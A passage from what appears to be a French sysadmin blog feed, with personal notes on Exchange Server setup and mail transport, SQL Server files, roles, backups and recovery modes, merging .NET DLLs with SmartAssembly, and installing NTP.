class="n">Web-Stat-Compression</span><span class="p">,</span><span class="n">Web-Static-Content</span><span class="p">,</span><span class="n">Web-Windows-Auth</span><span class="p">,</span><span class="n">Web-WMI</span><span class="p">,</span><span class="n">Windows-Identity-Foundation</span><span class="p">,</span><span class="n">RPC-over-HTTP-proxy</span><span class="p">,</span><span class="n">RSAT-Clustering</span><span class="p">,</span><span class="n">RSAT-Clustering-CmdInterface</span><span class="p">,</span><span class="n">RSAT-Clustering-Mgmt</span><span class="p">,</span><span class="n">RSAT-Clustering-PowerShell</span><span class="p">,</span><span class="n">Desktop-Experience</span>
<span class="nb">Install-WindowsFeature</span> <span class="n">RSAT-ADDS-Tools</span> <span class="n">RSAT-ADDS</span>
<span class="n">FilterPack64</span>
<span class="n">UcmaRuntimeSetup</span>
<span class="c"># Monter l'iso Exchange</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">PrepareAD</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span> <span class="p">/</span><span class="n">OrganizationName</span><span class="err">:</span><span class="s2">"starwars"</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">role</span><span class="err">:</span><span class="n">MB</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span>
<span class="p">.\</span><span class="n">setup</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">role</span><span class="err">:</span><span class="n">CA</span> <span class="p">/</span><span class="n">IAcceptExchangeServerLicenceTerms</span>
</code></pre></div>
<h1>Fichiers de BAL</h1>
<ul>
<li>Base de données : edb</li>
<li>Journal des transactions : log</li>
<li>Point de contrôle : chk</li>
<li>Fichier temporaire : tmp.edb</li>
</ul>
<h1>Destinataires possibles</h1>
<ul>
<li>Boites aux lettres utilisateurs (interne)</li>
<li>Contacts de messagerie</li>
<li>Utilisateurs de messagerie (externe)</li>
<li>Dossiers publics</li>
<li>Boite aux lettres de ressources</li>
<li>Boite aux lettres partagées</li>
<li>Boite aux lettres liées</li>
<li>Boite aux lettres distante</li>
<li>Boite aux lettres de sites</li>
<li>Groupe de sécurité et de distribution à extension de messagerie (RBAC - délégation)</li>
<li>Liste d'adresses globales (requête LDAP vers le CG)</li>
</ul>
<h1><img alt="" src="https://img.nlegall.fr/glZQdNRf"> ActiveSync</h1>
<h2>Fonctionnement</h2>
<ol>
<li>Configuration d'un compte ActiveSync sur un appareil mobile en entrant une adresse de messagerie et le mot de passe associé</li>
<li>Résolution DNS afin de connaître l'URL d'accès à l'autodiscover du domaine</li>
<li>L'appareil mobile se connecte au site virtuel de l'autodiscover</li>
<li>Le service Autodiscover envoie une réponse XML via le pare-feu SSL afin de paramétrer la synchronisation</li>
</ol>
<h2>Fonctionnalités</h2>
<ul>
<li>Indicateurs de suivi</li>
<li>Regroupement des messages</li>
<li>Synchronisation des SMS avec Exchange</li>
<li>Service d'effacement à distance</li>
<li>Mise à jour</li>
<li>Direct Push</li>
<li>Prise en charge des informations de disponibilité des contacts</li>
<li>Réinitialisation du code PIN</li>
</ul>
<h1>DAG (Database Availability Groupment)</h1>
<p><em>Groupe de base de données à des fins de hautes disponibilités de boîtes aux lettres.</em></p>
<p>Un groupement DAG permet la réplication des bases de données sélectionnées dans la console ou via PowerShell. Le basculement entre les deux serveurs se fait automatiquement via un serveur témoin choisi lors de la création du DAG. Maximun de 16 copies de la base de données. Retard de relecture. Serveur témoin (quorum) est obligatoire.</p>
<p><img alt="" src="https://img.nlegall.fr/2bIIAqpM"></p>
<p><strong>Un serveur BAL ne peut faire parti que d'un seul DAG à la fois.</strong></p>
<h1>SSL</h1>
<ol>
<li>Génération depuis la console ECP ou PowerShell de la requête de certificat</li>
<li>Création du certificat via l’autorité racine et récupération</li>
<li>Ajout du certificat à la demande Exchange</li>
<li>Déploiement du certificat racine sur l'ensemble des postes</li>
<li>Sélection du nouveau certificat dans IIS</li>
</ol>
<h1>Transport des messages</h1>
<ul>
<li>MTA (Mail Transport Agent) : Serveur chargé du transport du courrier et communique entre eux via SMTP</li>
<li>MDA (Mail Delivery Agent) : Serveur chargé de stocker les mails entrants jusqu'à ce que l'utilisateur vienne les relever</li>
<li>MUA (Mail User Agent) : Logiciel installé sur le système de l'utilisateur (client de messagerie)</li>
</ul>
<p>Cheminement :</p>
<ol>
<li>Vérification des domaines acceptés (BAL)</li>
<li>Requête LDAP pour avoir le GUID (BAL / client Outlook)</li>
<li>Récupération du mail (HUB)</li>
<li>Transport vers le serveur BAL contenant la base de données de la boites aux lettres cibles (BAL)</li>
</ol>
<h2>SMTP</h2>
<table>
<thead>
<tr>
<th>Commande</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>HELO <fqdn></td>
<td>identifie le serveur émetteur</td>
</tr>
<tr>
<td>MAIL FROM:<emetteur></td>
<td>identifie l'émetteur du message</td>
</tr>
<tr>
<td>RCPT FROM:<emetteur></td>
<td>identifie le destinataire du message</td>
</tr>
<tr>
<td>DATA</td>
<td>envoie le message au serveur de destination</td>
</tr>
<tr>
<td>RSET</td>
<td>abandonne l'envoi du message en cours</td>
</tr>
<tr>
<td>VRFY <chaine></td>
<td>vérifie que le destinataire est valide sur le serveur destination</td>
</tr>
<tr>
<td>HELP</td>
<td>affiche la liste des commandes SMTP supportées</td>
</tr>
<tr>
<td>QUIT</td>
<td>déconnecte la session</td>
</tr>
<tr>
<td>TURN</td>
<td>envoie les messages en liste d'attente</td>
</tr>
</tbody>
</table>
<h2>Protocole</h2>
<p><img alt="" src="https://img.nlegall.fr/WMmhAKW2"></p>
<table>
<thead>
<tr>
<th>Protocole</th>
<th>Port non sécurisé</th>
<th>Port TLS/SSL</th>
</tr>
</thead>
<tbody>
<tr>
<td>HTTP</td>
<td>80</td>
<td>443</td>
</tr>
<tr>
<td>POP3</td>
<td>110</td>
<td>995</td>
</tr>
<tr>
<td>IMAP4</td>
<td>143</td>
<td>993</td>
</tr>
<tr>
<td>SMTP</td>
<td>25</td>
<td>25</td>
</tr>
<tr>
<td>Soumission client</td>
<td>587</td>
<td>587</td>
</tr>
<tr>
<td>Synchronisation EdgeSync/ADAM</td>
<td>50636</td>
<td>50636</td>
</tr>
</tbody>
</table>
<h1>S/MIME</h1>
<p><img alt="" src="https://img.nlegall.fr/iL47gp9M"></p>
<h1>Sauvegarde</h1>
<ul>
<li>Pour tout les rôles : le système complet et la configuration Active Sync</li>
<li>Pour les BAL : bases de données et journaux (vss)</li>
<li>Pour les CAS : certificats SSL et configuration complète IIS</li>
<li><code>.\appcmd.exe add backup IIS</code></li>
<li>Durée de rétention des éléments supprimés et boites aux lettres supprimées (la règle au plus près de l'objet l'emporte)</li>
</ul>
<h2>Restauration</h2>
<table>
<thead>
<tr>
<th>Nom</th>
<th>Définition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Restauration de base de données</td>
<td>Remplace une base de données existante</td>
</tr>
<tr>
<td>Base de données de récupération</td>
<td>Restaure la base de données perdue dans la base de données de récupération à partie d'une sauvegarde</td>
</tr>
<tr>
<td>Récupération de tonalité</td>
<td>Remet en place un service Exchange avant la restauration de l'historique des mails</td>
</tr>
<tr>
<td>Récupération de DAG</td>
<td>Monte une copie passive d'une base de données du DAG sur un autre serveur BAL</td>
</tr>
</tbody>
</table>
<h1>Règles de transports</h1>
<ul>
<li>Limitent les flux de messages</li>
<li>Modifient le contenu des messages en transit</li>
<li>Empêcher les utilisateurs spécifiés d'échanger des courriers électroniques avec d'autres utilisateurs définis</li>
<li>Bloquer tout contenu inapproprié entrant ou sortant</li>
<li>Appliquer des restrictions basées sur les classifications de messages afin de restreindre le flux d'informations confidentielles de l'organisation</li>
<li>Suivre ou journaliser les messages échangés avec certaines personnes</li>
<li>Rediriger les messages entrants ou sortants pour les examiner avant leur remise</li>
<li></li>
</ul>
<h1>Pare-feu</h1>
<table>
<thead>
<tr>
<th>Pare-feu</th>
<th>Règle du pare-feu</th>
<th>Explications</th>
</tr>
</thead>
<tbody>
<tr>
<td>Externe</td>
<td>Autoriser l'ouverture du port TCP/25 à partir des IP externes vers le relais</td>
<td>Autorise les hôtes SMTP sur internet à envoyer des mails</td>
</tr>
<tr>
<td>Externe</td>
<td>Autoriser l'ouverture du port TCP/25 vers les IP externes à partir du relais</td>
<td>Permet au relais d'envoyer des mails sur des hôtes SMTP internet</td>
</tr>
<tr>
<td>Externe</td>
<td>Autoriser l'ouverture du port TCP/53 et UPD/53 vers les IP externes à partir du relais</td>
<td>Permet la résolution des noms DNS sur internet</td>
</tr>
<tr>
<td>Interne</td>
<td>Autoriser l'ouverture du port TCP/25 à partir du relais vers le CAS</td>
<td>Permet au relais SMTP d'envoyer des mails au CAS</td>
</tr>
<tr>
<td>Interne</td>
<td>Autoriser l'ouverture du port TCP/25 à partir du CAS vers le relais</td>
<td>Permet au CAS d'envoyer des mails entrants</td>
</tr>
<tr>
<td>Interne</td>
<td>Si AD LDS, autoriser l'ouverture du port TCP/50636 à partir du CAS vers le relais</td>
<td>Permet la communication entre ADDS et ADLDS</td>
</tr>
</tbody>
</table>MS SQL Server2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/ms-sql-server.html<h1>Types de commandes SQL Server</h1>
<table>
<thead>
<tr>
<th>DDL (data definition langage)</th>
<th>DML (data manipulation langage)</th>
<th>DCL (data control langage)</th>
<th>TCL (Transaction Control Language)</th>
</tr>
</thead>
<tbody>
<tr>
<td>CREATE</td>
<td>INSERT</td>
<td>GRANT</td>
<td>BEGIN</td>
</tr>
<tr>
<td>DROP</td>
<td>UPDATE</td>
<td>REVOKE</td>
<td>TRAN</td>
</tr>
<tr>
<td>TRUNCATE</td>
<td>DELETE</td>
<td></td>
<td>COMMIT</td>
</tr>
<tr>
<td>ALTER</td>
<td>SELECT</td>
<td></td>
<td>ROLLBACK</td>
</tr>
</tbody>
</table>
<h1>Fichier</h1>
<p><img alt="" src="https://img.nlegall.fr/Sem8Qmy3"></p>
<p>Il est recommandé de séparer les deux fichiers (base de données et journaux) sur …</p><h1>Types de commandes SQL Server</h1>
<table>
<thead>
<tr>
<th>DDL (data definition langage)</th>
<th>DML (data manipulation langage)</th>
<th>DCL (data control langage)</th>
<th>TCL (Transaction Control Language)</th>
</tr>
</thead>
<tbody>
<tr>
<td>CREATE</td>
<td>INSERT</td>
<td>GRANT</td>
<td>BEGIN</td>
</tr>
<tr>
<td>DROP</td>
<td>UPDATE</td>
<td>REVOKE</td>
<td>TRAN</td>
</tr>
<tr>
<td>TRUNCATE</td>
<td>DELETE</td>
<td></td>
<td>COMMIT</td>
</tr>
<tr>
<td>ALTER</td>
<td>SELECT</td>
<td></td>
<td>ROLLBACK</td>
</tr>
</tbody>
</table>
<h1>Fichier</h1>
<p><img alt="" src="https://img.nlegall.fr/Sem8Qmy3"></p>
<p>Il est recommandé de séparer les deux fichiers (base de données et journaux) sur des disques différents pour améliorer les performances (I/O).</p>
<table>
<thead>
<tr>
<th>Extension</th>
<th>Rôles</th>
</tr>
</thead>
<tbody>
<tr>
<td>mdf (master data file)</td>
<td>Données utilisateurs et système</td>
</tr>
<tr>
<td>ndf (second data file)</td>
<td>Données utilisateurs</td>
</tr>
<tr>
<td>ldf</td>
<td>Journal des transactions (restauration/sauvegarde)</td>
</tr>
</tbody>
</table>
<p>De base, les fichiers MDF et NDF sont regroupés dans un groupe PRIMARY. Il peut être cependant judicieux de séprarer ces fichiers en groupes différents pour les répartir sur des supports physiques différents.</p>
<p><img alt="" src="https://img.nlegall.fr/3mwVjjfQ"></p>
<h1>Création d'une base de données</h1>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">DB</span>
<span class="c1">-- groupe de fichiers</span>
<span class="k">ON</span> <span class="k">PRIMARY</span>
<span class="p">(</span>
<span class="k">SIZE</span> <span class="o">=</span> <span class="mi">5120</span><span class="n">KB</span><span class="p">,</span>
<span class="n">MAXSIZE</span> <span class="o">=</span> <span class="mi">15360</span><span class="n">KB</span><span class="p">,</span>
<span class="n">FILEGROWTH</span> <span class="o">=</span> <span class="mi">1024</span><span class="n">KB</span>
<span class="p">)</span>
<span class="n">LOG</span> <span class="k">ON</span>
<span class="p">(</span>
<span class="c1">-- nom</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="ss">"DB_log"</span><span class="p">,</span>
<span class="c1">-- chemin physique</span>
<span class="n">FILENAME</span> <span class="o">=</span> <span class="ss">"C:\xxxx"</span><span class="p">,</span>
<span class="c1">-- taille</span>
<span class="k">SIZE</span> <span class="o">=</span> <span class="mi">1024</span><span class="n">KB</span><span class="p">,</span>
<span class="c1">-- augmentation possible</span>
<span class="n">FILEGROWTH</span> <span class="o">=</span> <span class="mi">10</span><span class="o">%</span>
<span class="p">)</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="c1">-- liste des fichiers MDF</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">sysdatabases</span>
<span class="c1">-- liste de le l'ensemble des fichiers utilisés par la BDD (size en block de 8ko)</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">from</span> <span class="n">sys</span><span class="p">.</span><span class="n">database_files</span>
</code></pre></div>
<p>On peut rajouter un second fichier pour les données utilisateurs pour la base. Il faut pour cela, créer d'abord un nouveau groupe de fichiers.</p>
<div class="highlight"><pre><span></span><code><span class="c1">-- Ajout d'un nouveau groupe de fichier déjà créé</span>
<span class="k">ALTER</span> <span class="k">DATABASE</span> <span class="n">BDD</span> <span class="k">ADD</span> <span class="n">FILEGROUP</span> <span class="k">DATA</span><span class="p">;</span>
<span class="c1">-- Ajout d'un fichier créé</span>
<span class="k">ALTER</span> <span class="k">DATABASE</span> <span class="n">BDD</span> <span class="k">ADD</span> <span class="n">FILE</span> <span class="p">(</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="ss">"BDD2"</span><span class="p">,</span>
<span class="n">FILENAME</span> <span class="o">=</span> <span class="ss">"C:\xxxx"</span><span class="p">,</span>
<span class="k">SIZE</span> <span class="o">=</span> <span class="mi">5120</span><span class="n">KB</span><span class="p">,</span>
<span class="n">FILEGROWTH</span> <span class="o">=</span> <span class="mi">1024</span><span class="n">KB</span>
<span class="p">)</span>
</code></pre></div>
<p>Cependant, un fois un fichier associé à un groupe, il <strong>ne peut plus être changer</strong> de groupe. Idem pour une table faite sur un groupe particulier.</p>
<blockquote>
<p>La répartition physique se prévoit donc à la conception de la base et non après. Cela permet de répartir les tables sur plusieurs disques (amélioration des I/O).</p>
</blockquote>
<h1>Partitionnement</h1>
<p><img alt="" src="https://img.nlegall.fr/p4OxTVWe"></p>
<p>Permet de diviser une table de grande taille en plusieurs sous tables. Chacune de ces tables peut être créée sur un groupe différent enfin de profiter des avantages des groupes.</p>
<p>Il faut cependant que les collones qui seront partitionnées soient membres de la clé primaire de la table.</p>
<ol>
<li>Créer les groupes</li>
<li>Fonction de partitionnement (connaitre les valeurs des bornes, right ou left, type de donnée)</li>
<li>Schéma de partitionnement (répartir les informations dans les groupes)</li>
<li>Créer les tables : <code>CREATE TABLE table () ON schema(collone)</code></li>
</ol>
<h1>Authentification</h1>
<p><img alt="" src="https://img.nlegall.fr/KfgB21ub"></p>
<p>Mappage possible :</p>
<ul>
<li>Explicite : <code>CREATE USER</code></li>
<li>Implicite : avec guest/dbo</li>
</ul>
<h2>GRANT</h2>
<p>Donne une autorisation pour un utilisateur</p>
<div class="highlight"><pre><span></span><code><span class="k">GRANT</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h2>REVOKE</h2>
<p>Révoque une autorisation d'un utilisateur</p>
<div class="highlight"><pre><span></span><code><span class="k">REVOKE</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h2>DENY</h2>
<p>Interdit une action pour un utilisateur</p>
<div class="highlight"><pre><span></span><code><span class="n">DENY</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h1>Rôles</h1>
<p>Ils sont définis sur trois niveau :</p>
<ul>
<li>Instance</li>
<li>Base de données</li>
<li>Applications</li>
</ul>
<p><img alt="" src="https://img.nlegall.fr/Wzxot7k5"></p>
<h2>Rôles d'instances</h2>
<table>
<thead>
<tr>
<th>Nom</th>
<th>Droit</th>
</tr>
</thead>
<tbody>
<tr>
<td>sysadmin</td>
<td>Administrateur de l'instance</td>
</tr>
<tr>
<td>serveradmin</td>
<td>Paramètres de l'instance</td>
</tr>
<tr>
<td>setupadmin</td>
<td>Ajouter/supprimer des instances et procédures de <code>sp_serveroptions</code></td>
</tr>
<tr>
<td>securityadmin</td>
<td>Connexions à l'instance</td>
</tr>
<tr>
<td>processadmin</td>
<td>Traitements utilisant SQL Server</td>
</tr>
<tr>
<td>dbcreator</td>
<td>Créer/modifier les BDD</td>
</tr>
<tr>
<td>diskadmin</td>
<td>Fichiers des bases de données</td>
</tr>
<tr>
<td>bulkadmin</td>
<td>BULK INSERT</td>
</tr>
</tbody>
</table>
<h2>Rôles de base de données</h2>
<blockquote>
<p>membre de <code>sysadmin</code>, <code>db_owner</code> ou <code>db_securityadmin</code></p>
</blockquote>
<p>Regroupe les différentes autoristations ou refus. Concerne les bases de données.</p>
<div class="highlight"><pre><span></span><code><span class="k">USER</span> <span class="n">bdd</span>
<span class="k">CREATE</span> <span class="k">ROLE</span> <span class="n">name</span>
<span class="k">GRANT</span> <span class="k">INSERT</span><span class="p">,</span><span class="k">UPDATE</span><span class="p">,</span><span class="k">DELETE</span> <span class="k">TO</span> <span class="n">name</span>
<span class="k">ALTER</span> <span class="k">ROLE</span> <span class="n">name</span> <span class="k">ADD</span> <span class="n">MEMBER</span> <span class="k">user</span>
<span class="c1">-- schéma</span>
<span class="k">GRANT</span> <span class="k">SELECT</span> <span class="k">ON</span> <span class="k">schema</span><span class="p">::</span><span class="n">dbo</span> <span class="k">TO</span> <span class="k">user</span>
</code></pre></div>
<p>Le compte d'utilisateur dbo est fréquemment confondu avec le rôle de base de données fixe db_owner. La portée de db_owner est une base de données, tandis qeue la portée de sysadmin est le serveur dans son intégralité. L'appartenance au rôle db_owner ne confère pas les privilèges d'utilisateur dbo. </p>
<h2>Rôles d'applications</h2>
<p>De même que pour les rôles de base de données mais au niveau des tables. Aucun utilisateur ne peut y être ajouté et il est protégé par un mot de passe. Ces rôles prennent le pas sur les autres rôles qui peuvent être défini.</p>
<div class="highlight"><pre><span></span><code><span class="n">sp_setapprole</span> <span class="s1">'role'</span><span class="p">,</span> <span class="s1">'password'</span>
</code></pre></div>
<h1>Vues</h1>
<p>Une vue peut être utilisée aux fins suivantes :</p>
<ul>
<li>pour affiner, simplifier et personnaliser la perception de la base de données par chaque utilisateur.</li>
<li>comme mécanisme de sécurité en permettant aux utilisateurs d'accéder aux données par le biais de la vue, sans leur accorder d'autorisations qui leur permettraient d'accéder directement aux tables de base sous-jacentes de la vue.</li>
<li>pour fournir une interface à compatibilité descendante pour émuler une table dont le schéma a été modifié.</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">VIEW</span> <span class="n">Employee</span> <span class="k">AS</span>
<span class="k">SELECT</span> <span class="n">Name</span><span class="p">,</span> <span class="n">BirthDate</span><span class="p">,</span> <span class="n">Salary</span><span class="p">,</span> <span class="n">BuildingName</span>
<span class="k">FROM</span> <span class="n">Employee2</span> <span class="n">e</span><span class="p">,</span> <span class="n">Department</span> <span class="n">d</span>
<span class="k">WHERE</span> <span class="n">e</span><span class="p">.</span><span class="n">DeptId</span> <span class="o">=</span> <span class="n">d</span><span class="p">.</span><span class="n">DeptId</span>
</code></pre></div>
<h1>Informations systèmes</h1>
<div class="highlight"><pre><span></span><code><span class="c1">-- Connexion</span>
<span class="n">USE</span> <span class="n">master</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">sql_logins</span> <span class="c1">--seulement sql server</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">server_principals</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">server_permissions</span> <span class="c1">-- GRANTEE action/GRANTOR qui</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">server_role_members</span>
<span class="k">SELECT</span> <span class="n">name</span><span class="p">,</span> <span class="n">permission_name</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">server_principals</span> <span class="n">who</span> <span class="k">INNER</span> <span class="k">JOIN</span>
<span class="n">sys</span><span class="p">.</span><span class="n">server_permissions</span> <span class="n">what</span> <span class="k">ON</span> <span class="n">who</span><span class="p">.</span><span class="n">principal_id</span> <span class="o">=</span> <span class="n">what</span><span class="p">.</span><span class="n">grantee_principal_id</span>
<span class="c1">-- Utilisateur</span>
<span class="n">USE</span> <span class="n">bddnamer</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">database_principals</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">atabase_permissions</span> <span class="c1">-- GRANTEE action/GRANTOR qui</span>
<span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">sys</span><span class="p">.</span><span class="n">atabase_role_members</span>
</code></pre></div>
<h1>Planification des tâches</h1>
<p><em>L'ensemble des données sont stockées dans la base MSDB.</em></p>
<p><img alt="" src="https://img.nlegall.fr/Vphb65HV"></p>
<ul>
<li>Travail : automatisation de tâches d'administration ou répétitives. Il peut être planifié ou exécuter manuellement. Ils sont stockés dans la table sysjobs. C'est l'agent SQL Server qui est en charge de leur exécution.</li>
<li>Alerte : déclenchement d'un traitement automatique pour corriger un problème et/ou avertir un opérateur. Elle peut être liée à un numéro d'erreur ou une gravité de message d'erreur. Elle est valide pour une ou toutes les bases de données d'une instance.</li>
<li>Opérateur : personne physique ou rôle averti lors de la fin d'exécution d'un travail ou lors d'un déclenchement d'une alerte pour informer de la gravité de la situation. Trois moyens possible : mail, radiomessage ou message réseau (net send). Il n'a aucun lien avec un utilisateur de BDD.</li>
</ul>
<h1>Sauvegardes</h1>
<ul>
<li>Complète : (données et journaux) obligatoire - long et volumineux en sauvegarde mais restauration rapide</li>
<li>Différentielle : (données) différences depuis la dernière complète</li>
<li>Journaux : (journaux) rapide, vide le journal des instructions avant le dernier checkpoint - long car rejoue toutes les insctructions</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="c1">-- COMPLETE</span>
<span class="c1">-- La sauvegarde sera répartie sur deux fichiers et non mirroir</span>
<span class="n">BACKUP</span> <span class="k">DATABASE</span> <span class="n">name</span>
<span class="k">TO</span> <span class="n">DISK</span><span class="o">=</span><span class="s1">'C:\backups\name.bak'</span><span class="p">,</span>
<span class="n">DISK</span><span class="o">=</span><span class="s1">'C:\backups\name_2.bak'</span>
<span class="k">WITH</span> <span class="n">INIT</span><span class="p">,</span>
<span class="c1">-- nom de la sauvegarde</span>
<span class="n">MEDIANAME</span><span class="o">=</span><span class="s1">'Backup Full'</span><span class="p">,</span>
<span class="c1">-- compression du fichier</span>
<span class="n">COMPRESSION</span>
<span class="c1">-- DIFERENCIELLE</span>
<span class="n">BACKUP</span> <span class="k">DATABASE</span> <span class="n">name</span>
<span class="k">TO</span> <span class="n">DISK</span><span class="o">=</span><span class="s1">'C:\backups\name.bak'</span>
<span class="k">WITH</span> <span class="n">DIFFERENTIAL</span><span class="p">,</span>
<span class="n">MEDIANAME</span><span class="o">=</span><span class="s1">'Backup Full'</span>
<span class="c1">-- JOURNAUX</span>
<span class="n">BACKUP</span> <span class="n">LOG</span> <span class="n">name</span>
<span class="k">TO</span> <span class="o"><</span><span class="n">backup_device</span><span class="o">></span>
</code></pre></div>
<h2>Mode de récupération</h2>
<ul>
<li>Simple : le journal est utilisé seulement pour garentir la persistance des opérations. Il est vidé lors de chaque point de synchronisation (CHECKPOINT).</li>
<li>Complet : toutes les actions sont consignées dans le journal et y restent même après un point de synchronisation.</li>
<li>Journalisé en bloc : les informations relatives aux transactions mais également certaines opérations affectant les données (création d'index).</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="k">ALTER</span> <span class="k">DATABASE</span> <span class="n">name</span>
<span class="k">SET</span> <span class="n">RECOVERY</span> <span class="err">{</span> <span class="k">SIMPLE</span> <span class="o">|</span> <span class="k">FULL</span> <span class="o">|</span> <span class="n">BULK_LOGGED</span> <span class="err">}</span>
</code></pre></div>
<h1>Optimisation</h1>
<table>
<thead>
<tr>
<th>Performances</th>
<th>Espace</th>
<th>Travail du DBA</th>
<th>Sécurité</th>
<th>Intégrité</th>
</tr>
</thead>
<tbody>
<tr>
<td>Matériel</td>
<td>Limité index</td>
<td>Plannification</td>
<td>Rôles</td>
<td>Contraintes</td>
</tr>
<tr>
<td>Index</td>
<td>Type de données</td>
<td>Alertes</td>
<td>Vues</td>
<td>Sauvegarde</td>
</tr>
<tr>
<td>Groupe de fichiers</td>
<td>Compression (save, table, index)</td>
<td></td>
<td>Schémas</td>
<td>HA</td>
</tr>
<tr>
<td>Requêtes</td>
<td>Archivage</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Type de données</td>
<td>DBCC</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<h2>Espace disque</h2>
<h2>SHRINKDATABASE</h2>
<p>Permet de compacter l'ensemble des fichiers constituans la base de données (journaux et données).</p>
<h2>SHRINKFLE</h2>
<p>Permet de compacter suelement un des fichiers de données .</p>.net framework2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/net-framework.html<p><img alt="" src="https://img.nlegall.fr/qARgTp0Q"></p>
<h1>Intégration des DLLs</h1>
<h2>Pré-requis</h2>
<ul>
<li>SmartAssembly : https://www.red-gate.com/products/dotnet-development/smartassembly/</li>
<li>.NET Framework 4.5.2 Developer Pack : https://www.microsoft.com/fr-fr/download/details.aspx?id=42637</li>
</ul>
<h2>Instructions</h2>
<p>Lancez l'application. Vous aurez à sélectionner l'application dont vous désirez y ajouter les DLLs. Spécifiez ensuite le chemin de sorti …</p><p><img alt="" src="https://img.nlegall.fr/qARgTp0Q"></p>
<h1>Intégration des DLLs</h1>
<h2>Pré-requis</h2>
<ul>
<li>SmartAssembly : https://www.red-gate.com/products/dotnet-development/smartassembly/</li>
<li>.NET Framework 4.5.2 Developer Pack : https://www.microsoft.com/fr-fr/download/details.aspx?id=42637</li>
</ul>
<h2>Instructions</h2>
<p>Lancez l'application. Vous aurez à sélectionner l'application dont vous désirez y ajouter les DLLs. Spécifiez ensuite le chemin de sorti pour le nouvelle exécutable qui sera généré.</p>
<p>Une fois cela fait, vous alors un ensemble d'options possibles. Descendez jusqu'à la partie <code>Dependencies Merging</code>.</p>
<p><img alt="" src="https://img.nlegall.fr/rq1vjonb"></p>
<p>L'ensemble des DLLs référencées par l'application s'y trouve. Choissez celles que vous souhaitez ajouté au nouveau binaire.</p>
<p>Cliquez sur le bouton <code>Build</code>.</p>
<h2>Intégration VS</h2>
<p><em>Le binaire généré par SA sera alors dans le chemin défini lors du projet créé par le logiciel.</em></p>
<div class="highlight"><pre><span></span><code><span class="nt"><UsingTask</span> <span class="na">TaskName=</span><span class="s">"SmartAssembly.MSBuild.Tasks.Build"</span> <span class="na">AssemblyName=</span><span class="s">"SmartAssembly.MSBuild.Tasks, Version=6.0.0.0,Culture=neutral, PublicKeyToken=7f465a1c156d4d57"</span> <span class="nt">/></span>
<span class="nt"><Target</span> <span class="na">Name=</span><span class="s">"AfterBuild"</span> <span class="na">Condition=</span><span class="s">" '$(Configuration)' == 'Release' "</span><span class="nt">></span>
<span class="nt"><SmartAssembly.MSBuild.Tasks.Build</span> <span class="na">ProjectFile=</span><span class="s">"C:\path\to\project.saproj"</span> <span class="nt">/></span>
<span class="nt"></Target></span>
</code></pre></div>NTP2018-11-24T10:20:00+01:002018-11-24T10:20:00+01:00nlegalltag:blog.nlegall.fr,2018-11-24:/ntp.html<p><em>RFC-1305</em></p>
<h1>Fonctionnement</h1>
<p>Network Time Protocol ou NTP est un protocole qui permet de synchroniser, via un réseau informatique, l'horloge locale d'ordinateurs sur une référence d'heure</p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Network_Time_Protocol_servers_and_clients.svg/470px-Network_Time_Protocol_servers_and_clients.svg.png"></p>
<h1>Installation serveur</h1>
<p>Le deamon n'est pas installé de base sur le système. Il faut donc l'ajouter manuellement au système.</p>
<div class="highlight"><pre><span></span><code>yum install ntp ntpdate
</code></pre></div>
<p>La configuration …</p><p><em>RFC-1305</em></p>
<h1>Fonctionnement</h1>
<p>Network Time Protocol ou NTP est un protocole qui permet de synchroniser, via un réseau informatique, l'horloge locale d'ordinateurs sur une référence d'heure</p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Network_Time_Protocol_servers_and_clients.svg/470px-Network_Time_Protocol_servers_and_clients.svg.png"></p>
<h1>Installation serveur</h1>
<p>Le deamon n'est pas installé de base sur le système. Il faut donc l'ajouter manuellement au système.</p>
